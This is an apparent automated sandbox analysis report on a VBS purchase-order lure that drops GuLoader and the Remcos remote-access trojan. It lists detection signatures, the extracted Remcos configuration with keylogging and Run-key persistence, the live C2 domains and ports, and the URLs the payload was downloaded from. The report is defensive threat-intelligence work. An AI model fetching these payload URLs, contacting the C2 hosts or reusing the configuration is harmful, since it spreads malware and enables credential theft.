Windows Analysis Report
TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs

Overview

General Information

Sample name: TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs
Analysis ID: 1465344
MD5: 003c272edd6f7cf2b08bfc98d1d48c7c
SHA1: a6ee590e3b81dbbce6e550c6dba9256c76cd4e21
SHA256: 78e63f6cc614c9dcc77c0c6b8fc6088ce89533d7c05b66b7732904ad6bc886d6
Tags: vbs
Infos:

Detection

GuLoader, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Installs a global keyboard hook
Maps a DLL or memory area into another process
Obfuscated command line found
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Name Description Attribution Blogpost URLs Link
Remcos, RemcosRAT Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

AV Detection

barindex
Source: janbours92harbu02.duckdns.org Avira URL Cloud: Label: malware
Source: 0000000B.00000003.2574264775.00000000050D0000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": "janbours92harbu02.duckdns.org:3980:0janbours92harbu02.duckdns.org:3981:1janbours92harbu03.duckdns.org:3980:0", "Assigned name": "Proof007", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "jmoughoe-LDOW5Q", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "kpburtts.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: Yara match File source: 0000000B.00000003.2574264775.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2567181749.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 2264, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: unknown HTTPS traffic detected: 192.185.112.252:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 192.185.112.252:443 -> 192.168.2.6:50573 version: TLS 1.2
Source: Binary string: qm.Core.pdbr source: powershell.exe, 00000005.00000002.2558083418.00000000077B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2561261956.0000000008860000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5vs source: powershell.exe, 00000005.00000002.2549153346.0000000002F8D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2558083418.000000000774E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2561261956.0000000008860000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .Core.pdbTm source: powershell.exe, 00000005.00000002.2558083418.00000000077B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2558083418.000000000774E000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20EA10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 11_2_20EA10F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20EA6580 FindFirstFileExA, 11_2_20EA6580
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0040AE51 FindFirstFileW,FindNextFileW, 16_2_0040AE51
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 17_2_00407EF8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 18_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 18_2_00407898

Software Vulnerabilities

barindex
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

barindex
Source: Traffic Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.6:50575 -> 206.123.148.194:3980
Source: Traffic Snort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 206.123.148.194:3980 -> 192.168.2.6:50575
Source: Malware configuration extractor URLs: janbours92harbu02.duckdns.org
Source: unknown DNS query: name: janbours92harbu02.duckdns.org
Source: global traffic TCP traffic: 192.168.2.6:50575 -> 206.123.148.194:3980
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: Joe Sandbox View IP Address: 178.237.33.50 178.237.33.50
Source: Joe Sandbox View IP Address: 206.123.148.194 206.123.148.194
Source: Joe Sandbox View ASN Name: M247GB M247GB
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: GET /New/New/Pustene.lpk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: contemega.com.doConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /New/New/mVbkq170.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: contemega.com.doCache-Control: no-cache
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /New/New/Pustene.lpk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: contemega.com.doConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /New/New/mVbkq170.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: contemega.com.doCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: wab.exe, 0000000B.00000002.3444547352.0000000020E70000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.2582285664.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: wab.exe, wab.exe, 00000012.00000002.2582285664.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: wab.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: wab.exe, 00000010.00000002.2603458101.0000000004DF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: wab.exe, 00000010.00000002.2603458101.0000000004DF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: wab.exe, 0000000B.00000002.3444830875.00000000216F0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: wab.exe, 0000000B.00000002.3444830875.00000000216F0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: contemega.com.do
Source: global traffic DNS traffic detected: DNS query: janbours92harbu02.duckdns.org
Source: global traffic DNS traffic detected: DNS query: geoplugin.net
Source: bhv88BF.tmp.16.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: bhv88BF.tmp.16.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: bhv88BF.tmp.16.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhv88BF.tmp.16.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: bhv88BF.tmp.16.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: bhv88BF.tmp.16.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: bhv88BF.tmp.16.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: bhv88BF.tmp.16.dr String found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
Source: powershell.exe, 00000002.00000002.2605528910.000001DB97B20000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://contemega.com.do
Source: powershell.exe, 00000002.00000002.2679653181.000001DBAE348000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micros
Source: powershell.exe, 00000005.00000002.2558083418.00000000077B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft
Source: bhv88BF.tmp.16.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: bhv88BF.tmp.16.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhv88BF.tmp.16.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv88BF.tmp.16.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhv88BF.tmp.16.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
Source: bhv88BF.tmp.16.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhv88BF.tmp.16.dr String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: bhv88BF.tmp.16.dr String found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
Source: bhv88BF.tmp.16.dr String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: bhv88BF.tmp.16.dr String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: bhv88BF.tmp.16.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: bhv88BF.tmp.16.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv88BF.tmp.16.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
Source: bhv88BF.tmp.16.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhv88BF.tmp.16.dr String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: bhv88BF.tmp.16.dr String found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
Source: wab.exe, 0000000B.00000002.3429074546.0000000005068000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/
Source: wab.exe, 0000000B.00000003.2567181749.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp
Source: wab.exe, 0000000B.00000003.2574264775.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000003.2567181749.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp%p
Source: wab.exe, 0000000B.00000003.2574264775.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000003.2567181749.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp.p
Source: wab.exe, 0000000B.00000003.2574264775.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000003.2567181749.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpIp
Source: wab.exe, 0000000B.00000003.2574264775.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000003.2567181749.00000000050D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpVp
Source: wab.exe, 0000000B.00000003.2574264775.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000003.2567181749.00000000050D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpal
Source: powershell.exe, 00000002.00000002.2679653181.000001DBAE348000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://microsoft.co
Source: powershell.exe, 00000002.00000002.2668709649.000001DBA5DCE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2555412225.0000000005FB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2555412225.0000000005E76000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: bhv88BF.tmp.16.dr String found in binary or memory: http://ocsp.digicert.com0
Source: bhv88BF.tmp.16.dr String found in binary or memory: http://ocsp.digicert.com0:
Source: bhv88BF.tmp.16.dr String found in binary or memory: http://ocsp.digicert.com0H
Source: bhv88BF.tmp.16.dr String found in binary or memory: http://ocsp.digicert.com0I
Source: bhv88BF.tmp.16.dr String found in binary or memory: http://ocsp.digicert.com0Q
Source: bhv88BF.tmp.16.dr String found in binary or memory: http://ocsp.msocsp.com0
Source: bhv88BF.tmp.16.dr String found in binary or memory: http://ocsp.msocsp.com0S
Source: powershell.exe, 00000005.00000002.2550349673.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2558083418.0000000007706000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2605528910.000001DB95D61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2550349673.0000000004E11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2550349673.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2558083418.0000000007706000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: bhv88BF.tmp.16.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: bhv88BF.tmp.16.dr String found in binary or memory: http://www.digicert.com/CPS0~
Source: wab.exe, wab.exe, 00000012.00000002.2582285664.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com
Source: wab.exe, wab.exe, 00000012.00000002.2584615593.000000000329D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2582285664.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.com
Source: wab.exe, 0000000B.00000002.3444547352.0000000020E70000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.2582285664.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: wab.exe, 00000012.00000002.2584615593.000000000329D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.compData
Source: wab.exe, 0000000B.00000002.3444547352.0000000020E70000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.2582285664.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comr
Source: powershell.exe, 00000002.00000002.2679653181.000001DBAE348000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.c
Source: powershell.exe, 00000002.00000002.2679653181.000001DBAE348000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co0
Source: wab.exe, 00000010.00000002.2602811179.0000000002DD4000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net
Source: wab.exe, 00000012.00000002.2582285664.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
Source: powershell.exe, 00000002.00000002.2605528910.000001DB95D61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.2550349673.0000000004E11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: bhv88BF.tmp.16.dr String found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
Source: powershell.exe, 00000002.00000002.2605528910.000001DB97B1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contemega.P
Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contemega.c
Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contemega.co
Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contemega.com
Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contemega.com.
Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contemega.com.d
Source: powershell.exe, 00000002.00000002.2605528910.000001DB95F84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2605528910.000001DB977C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contemega.com.do
Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3429074546.0000000005068000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3429074546.0000000005038000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contemega.com.do/
Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contemega.com.do/N
Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contemega.com.do/Ne
Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contemega.com.do/New
Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contemega.com.do/New/
Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contemega.com.do/New/N
Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contemega.com.do/New/Ne
Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contemega.com.do/New/New
Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contemega.com.do/New/New/
Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contemega.com.do/New/New/P
Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contemega.com.do/New/New/Pu
Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contemega.com.do/New/New/Pus
Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contemega.com.do/New/New/Pust
Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contemega.com.do/New/New/Puste
Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contemega.com.do/New/New/Pusten
Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contemega.com.do/New/New/Pustene
Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contemega.com.do/New/New/Pustene.
Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contemega.com.do/New/New/Pustene.l
Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contemega.com.do/New/New/Pustene.lp
Source: powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contemega.com.do/New/New/Pustene.lpk
Source: powershell.exe, 00000002.00000002.2605528910.000001DB95F84000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contemega.com.do/New/New/Pustene.lpk0z
Source: powershell.exe, 00000005.00000002.2550349673.0000000004F65000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contemega.com.do/New/New/Pustene.lpkXR)l
Source: wab.exe, 0000000B.00000002.3429074546.00000000050A3000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3429074546.0000000005068000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3444052038.0000000020930000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://contemega.com.do/New/New/mVbkq170.bin
Source: wab.exe, 0000000B.00000002.3429074546.0000000005068000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contemega.com.do/New/New/mVbkq170.binN
